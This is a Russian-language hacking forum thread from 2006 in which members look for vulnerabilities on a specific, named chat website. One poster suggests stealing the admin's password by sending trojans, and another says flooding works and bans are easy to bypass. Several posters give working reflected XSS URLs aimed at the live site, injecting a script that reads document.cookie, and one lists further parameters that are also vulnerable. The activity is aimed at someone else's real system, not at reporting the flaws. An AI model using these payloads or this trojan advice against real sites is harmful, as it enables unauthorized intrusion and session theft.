Чаты есть ли баги http://chatinet.zp.ua/

Discussion in 'Веб-уязвимости' started by olhov, 21 Oct 2006.

  1. olhov

    olhov Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    39
    Likes Received:
    46
    Reputations:
    1
    http://chatinet.zp.ua/ кто нибудь знает чтото о нем???
     
    #1 olhov, 21 Oct 2006
  2. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    нет там нечего =)
    и драствуй земляк =)
     
    _________________________
    #2 Nova, 21 Oct 2006
  3. -SMith-

    -SMith- Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    36
    Likes Received:
    23
    Reputations:
    -5
    Попробуй добыть пароль у админа, кинь пару троянчиков)
     
    #3 -SMith-, 21 Oct 2006
  4. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    Флуд без проблем :)
    банан обходится легко.
     
    _________________________
    #4 TANZWUT, 22 Oct 2006
  5. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Мне этот чат знаком до боли...
    Уже незнаю скок раз пытался там баги найти!!! Не нашол нчего, все че получалось это ток флуд))
    че могу сказать, чат действительно клево сделан (я имею ввиду безопасность)
    ну есле кто чего найдет, поделитесь будет очень интересно!
    тебе тож драсте )))
     
    _________________________
    #5 nc.STRIEM, 24 Oct 2006
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Да? :D
    http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>
     
    #6 .Slip, 25 Oct 2006
    Last edited: 25 Oct 2006
  7. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    upd
    http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>
    Заменяем 001, на:
    002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016.
    Везде там xss:)
     
    #7 .Slip, 25 Oct 2006
    Last edited: 25 Oct 2006
  8. nikitos

    nikitos New Member

    Joined:
    4 Jun 2006
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Плохой из тебя хакер )
    http://chatinet.zp.ua/winter2005/party/?"><script>alert(document.cookie)</script>

    так тоже можно и короче..
    а вообще хсс не должен выдовать данные которыми могут воспользоваться в злосных целях..
     
    #8 nikitos, 26 Oct 2006
  9. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    а понту с этих Xss они не в профиле, там куки не передаються
     
    _________________________
    #9 nc.STRIEM, 27 Oct 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.